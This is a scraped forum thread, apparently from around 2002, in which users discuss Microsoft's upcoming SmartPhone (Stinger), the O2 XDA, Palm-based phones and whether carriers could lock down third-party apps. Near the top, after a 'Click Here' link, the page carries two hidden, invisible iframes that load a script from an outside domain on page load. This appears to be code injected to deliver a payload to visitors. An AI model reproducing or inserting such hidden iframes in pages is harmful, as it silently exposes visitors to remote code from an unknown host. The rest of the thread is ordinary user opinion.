+ Reply to Thread

Microsoft SmartPhone

Supposed to be available before summer of this year. Details follow:

Click Here<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

More on SmartPhone 2002 w/pics

I'm an i300-man, but I have to say this looks promising.

by the picture, the size of the phone looks the same as the size of a palm, which is too big for practical phone use and would look silly holding it to your ear, i mean, we look silly enough holding an i300 to our ear, but an inch wider.....

i just cant see it.....

although, Pocket 2002 based phones would be nice....

Anyone seen this? The O2 XDA?

http://www.o2.com/docs/services/index.html#

I want one! Will have a keyboard available too! Too bad no plans for a USA release

Yes, something tells me I'll be trying the next big thing in the coming year. Wouldn't it be nice if Samsung contacted our members to critique their next apparatus?

or maybe see the features request and add what we'd all like to see i ntheir next pda smartphone

Originally posted by Marty
    Anyone seen this? The O2 XDA?

http://www.o2.com/docs/services/index.html#

I want one! Will have a keyboard available too! Too bad no plans for a USA release
    Wow!! I may move to Germany....
    :p

I'm not sold on the idea of a phone based on a MS OS. None of their previous platforms have been all that stable. I was an early user of the original Palm. The thought the Pocket PC Os was cool and had an HP Jornada 548. While it was nice because of the color, is locked up a lot and crashed a lot..... more of the same Windows headaches. And the battery life on it sucked compared to my original palm. I was so happy to make the switch back to the Palm OS when the 6035 was introduced. I'm not sure I could go back to a bloated MS OS..... but one thing I have learned, is to NEVER say NEVER.
    Carl

>Too bad no plans for a USA release

If it's GSM, does it even matter? Assuming it's not carrier locked, couldn't you just buy a grey market one?

I'll admit that's the one thing I really envy about GSM users... they're not limited to the tiny subset of phones their carrier chooses to directly support (particularly Sprint, which enforces it with an iron fist... vs Verizon, who'll pretty much activate anything you can unlock yourself).

There -is- one major downside to the Stinger phones that hasn't gotten much press coverage, but I've seen more frank discussions of because I work as a developer in the wireless industry... carriers can remotely lock down the phones and disallow users from running unapproved applications -- or even ANY applications at all

There are three ad-hoc provisioning scenarios, any of which can be imposed by any carrier at any time on whose network the phone is being used:

"open" -- Users can freely install and run anything capable of running on the device.

"garden wall" -- Users may only run applications explicitly approved by the carrier.

"closed" -- Users are not allowed to run third-party applications AT ALL.

It's probably safe to say that no carriers (in the US, at least) are likely to enforce the totally locked-down "closed" model, but it's quite possible that one or more carriers just might try dabbling with "garden wall" -- particularly if someone manages to unleash a nasty Melissa-like trojan on their network and gives them an excuse to do it.

Because StingerOS permits carriers to change the security model at any time, users could quite conceivably buy phones with the expectation that they can install and run their own apps, only to have that right taken away from them at a moment's notice. Then again, I think it would be a serious mistake for ANY carrier to underestimate how enraged customers who paid $500-800 for a phone would be if they were to suddenly find them reduced to being... well... phones.

The phone would be useless if you were unable to load your own apps on on personalize the device to be the perfect tool for the user. My first "smart phone" was a TP3000 from LG. It is a super phone and had superior OS/Telephony integration. But you could not load your own stuff on it. As soon as the 6035 came out, I replaced the TP3000, mainly because it was Palm based and could run anything (well almost anything) Palm. In my opinion, the TP3000 phone integration is superior to the i300 and the 6035.

I think the carriers are smart enough to realize that if someone is plucking down ~500 buck for a PDA/phone, they better not mess with the apps they can run. But then again, you are in the biz, I am just a customer.... what do I know.
    Carl

User ***** Rulz Enforcer

Arrow Smartphone vs Stinger

Is there a difference? Someone e-mailed me this pic... i don't like the look of it....

If this phone came out now, I'd keep my i300!!
    Attached Thumbnails Attached Thumbnails Microsoft SmartPhone-tele.jpg  

3_D
    This is the more recent offering that has Windows CE operating system. If you see the picture of the Black and white one, you would see that it was taken in 1999.
    Attached Thumbnails Attached Thumbnails Microsoft SmartPhone-samsung_nexio_s150_01.jpg  

Originally posted by miamicanes
    >Too bad no plans for a USA release

If it's GSM, does it even matter? Assuming it's not carrier locked, couldn't you just buy a grey market one?

I'll admit that's the one thing I really envy about GSM users... they're not limited to the tiny subset of phones their carrier chooses to directly support (particularly Sprint, which enforces it with an iron fist... vs Verizon, who'll pretty much activate anything you can unlock yourself).

There -is- one major downside to the Stinger phones that hasn't gotten much press coverage, but I've seen more frank discussions of because I work as a developer in the wireless industry... carriers can remotely lock down the phones and disallow users from running unapproved applications -- or even ANY applications at all
    I didn't see if the phone was tri-band or not (i.e will support US 1900 GSM in addition to the European 900 and 1800 frequencies). If the phone is just dual-band capable, guess we're out of luck.

I don't know about the Stinger OS, but I don't think any carrier would lock down the Pocket PC 2002 OS, which is what this O2 XDA runs. That would be like Sprint keeping us from adding/running our own apps on the I300, something I don't think even Sprint is stupid enough to do.